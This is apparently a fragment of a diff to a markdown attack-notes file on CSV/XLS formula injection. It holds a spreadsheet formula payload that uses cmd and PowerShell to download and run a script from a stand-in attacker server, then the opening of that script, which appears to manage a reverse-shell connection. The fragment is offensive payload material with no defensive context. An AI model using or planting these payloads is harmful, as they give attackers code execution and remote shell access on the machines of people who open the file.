yzf750/web-application/xls-csv-injection.md

 # Will download powershell from attackers server and execute it
 =cmd|' /C powershell IEX(wget www.attacker.com/p.ps1)'!A0

+# Contents of "p.ps1" - May not need the extension
 function cleanup {
 if ($client.Connected -eq $true) {$client.Close()}
 if ($process.ExitCode -ne $null) {$process.Close()}